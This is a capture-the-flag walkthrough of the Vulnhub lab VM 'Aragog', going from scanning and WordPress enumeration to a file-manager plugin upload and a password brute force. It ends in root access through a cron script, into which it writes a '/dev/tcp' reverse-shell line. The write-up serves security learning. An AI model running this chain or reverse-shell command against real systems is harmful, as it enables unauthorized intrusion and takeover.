Description

Back to the Top

Aragog is the 1st VM of 3-box HarryPotter VM series in which you need to find 2 horcruxes hidden inside the machine (total 8 horcruxes hidden across 3 VMs of the HarryPotter Series) and ultimately defeat Voldemort.

This is the part 1 out of 3 VMs submitted on Vulnhub, So lets get started with it:

First of all lets check out the IP of the machine so that I can move ahead with the service enumeration.

┌──(root💀N4TR0)-[/home/s4t0sh/]
└─# netdiscover -i vboxnet1
Currently scanning: 192.168.20.0/16 | Screen View: Unique Hosts
2 Captured ARP Req/Rep packets, from 2 hosts. Total size: 102
____________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.1.1 08:00:27:f3:04:f7 1 42 PCS Systemtechnik GmbH
192.168.1.101 08:00:27:30:fb:c8 1 60 PCS Systemtechnik GmbH

Service Scan:

Now lets get the services running on the VM to proceed further.

┌──(root💀N4TR0)-[/home/s4t0sh/]
└─# nmap -v -sT -sC -p- -A 192.168.1.101 130 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-05 15:59 IST
..............
Nmap scan report for 192.168.1.101
Host is up (0.00045s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 48:df:48:37:25:94:c4:74:6b:2c:62:73:bf:b4:9f:a9 (RSA)
| 256 1e:34:18:17:5e:17:95:8f:70:2f:80:a6:d5:b4:17:3e (ECDSA)
|_ 256 3e:79:5f:55:55:3b:12:75:96:b4:3e:e3:83:7a:54:94 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:30:FB:C8 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Uptime guess: 41.396 days (since Thu Mar 25 06:29:32 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Here I got only two services running on it but looking ahead for the service exploits of respective versions got nothing may be thats a bed-luck of mine.

http://192.168.1.101/ 

Calling the ip on web got nothing but a single image.

I have nothing but the tool “dirb” may help further.

┌──(s4t0sh㉿N4TR0)-[~]
└─$ dirb http://192.168.1.101 130 ⨯

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Wed May 5 16:16:20 2021
URL_BASE: http://192.168.1.101/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.1.101/ ----
==> DIRECTORY: http://192.168.1.101/blog/
+ http://192.168.1.101/index.html (CODE:200|SIZE:97)
==> DIRECTORY: http://192.168.1.101/javascript/
+ http://192.168.1.101/server-status (CODE:403|SIZE:278)

---- Entering directory: http://192.168.1.101/blog/ ----
+ http://192.168.1.101/blog/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.1.101/blog/wp-admin/
==> DIRECTORY: http://192.168.1.101/blog/wp-content/
==> DIRECTORY: http://192.168.1.101/blog/wp-includes/
+ http://192.168.1.101/blog/xmlrpc.php (CODE:405|SIZE:42)

Here wordpress is running on the machine in another directory named “blog” so I switched to web without wasting nay time.

http://192.168.1.101/blog/wp-admin

I fired the wpscan tool on this to get more details.

┌──(root💀N4TR0)-[/home/s4t0sh/]
└─# wpscan --url http://192.168.1.101/blog/ -e ap --plugins-detection aggressive
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.10
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart


[i] Plugin(s) Identified:

[+] akismet
| Location: http://192.168.1.101/blog/wp-content/plugins/akismet/
| Latest Version: 4.1.9
| Last Updated: 2021-03-02T18:10:00.000Z
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.1.101/blog/wp-content/plugins/akismet/, status: 500
|
| The version could not be determined.

[+] wp-file-manager
| Location: http://192.168.1.101/blog/wp-content/plugins/wp-file-manager/
| Last Updated: 2021-03-30T06:37:00.000Z
| Readme: http://192.168.1.101/blog/wp-content/plugins/wp-file-manager/readme.txt
| [!] The version is out of date, the latest version is 7.1.1
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.1.101/blog/wp-content/plugins/wp-file-manager/, status: 200
|
| Version: 6.0 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.1.101/blog/wp-content/plugins/wp-file-manager/readme.txt

And the vulnerable plugin is with me, I checked the exploit and got it.

I uploaded my php reverse shell file.

As the path o f the file is already displayed here after it get upload so I fired up a listener to get the shell.

http://192.168.1.101/blog/wp-content/plugins/wp-file-manager/lib/files/install.php

And here I got it. On further enumerating here I got the first flag on this series which is a base64 encrypted.

horcrux_{MTogUmlkRGxFJ3MgRGlBcnkgZEVzdHJvWWVkIEJ5IGhhUnJ5IGluIGNoYU1iRXIgb2YgU2VDcmV0cw==}

Further checking the /home directory I got two users named “ginny” and “hagrid98” so I used them to check the user name of wordpress and got that “hagrid98” is a wordpress user. So to get the password I brute forced it.

┌──(root💀N4TR0)-[/home/s4t0sh/Downloads]
└─# wpscan --url http://192.168.1.101/blog/ -U hagrid98 -P /usr/share/wordlists/rockyou.txt -t 10 _________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.10
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________


[+] Performing password attack on Wp Login against 1 user/s
[SUCCESS] - hagrid98 / password123
Trying hagrid98 / password123 Time: 00:00:17 < > (1390 / 14345782) 0.00% ETA: ??:??:??

hagrid98 : password123

I switched to the user hagrid98 and enumerated further but got nothing, so I switched to cronjobs running on it.

Used a tool named “pspy” to monitor the events running and found that a file named “.backup.sh” in “opt” directory is running as root every 2 minutes apx.

./pspy64 -p

Without wasting much time I used the .backup.sh file to get the root shell and put a listener on to get the shell.

hagrid98@Aragog:/opt$  echo "bash -i >& /dev/tcp/192.168.1.1/1212 0>&1 " >> .backup.sh
<i >& /dev/tcp/192.168.1.1/1212 0>&1 " >> .backup.sh
hagrid98@Aragog:/opt$ cat .backup.sh
cat .backup.sh
#!/bin/bash

cp -r /usr/share/wordpress/wp-content/uploads/ /tmp/tmp_wp_uploads
bash -i >& /dev/tcp/192.168.1.1/1212 0>&1
root@Aragog:~# cat horcrux2.txt
cat horcrux2.txt
____ _ _ _ _
/ ___|___ _ __ __ _ _ __ __ _| |_ _ _| | __ _| |_(_) ___ _ __ ___
| | / _ \| '_ \ / _` | '__/ _` | __| | | | |/ _` | __| |/ _ \| '_ \/ __|
| |__| (_) | | | | (_| | | | (_| | |_| |_| | | (_| | |_| | (_) | | | \__ \
\____\___/|_| |_|\__, |_| \__,_|\__|\__,_|_|\__,_|\__|_|\___/|_| |_|___/
|___/


Machine Author: Mansoor R (@time4ster)
Machine Difficulty: Easy
Machine Name: Aragog
Horcruxes Hidden in this VM: 2 horcruxes

You have successfully pwned Aragog machine.
Here is your second hocrux: horcrux_{MjogbWFSdm9MbyBHYVVudCdzIHJpTmcgZGVTdHJPeWVkIGJZIERVbWJsZWRPcmU=}

Here I got the root privileges of the machine.

Enjoyed and learned much with this VM thanks to the author of the VM.

Hope you like it. For any query DM me.

❤❤HAPPY HACKING❤❤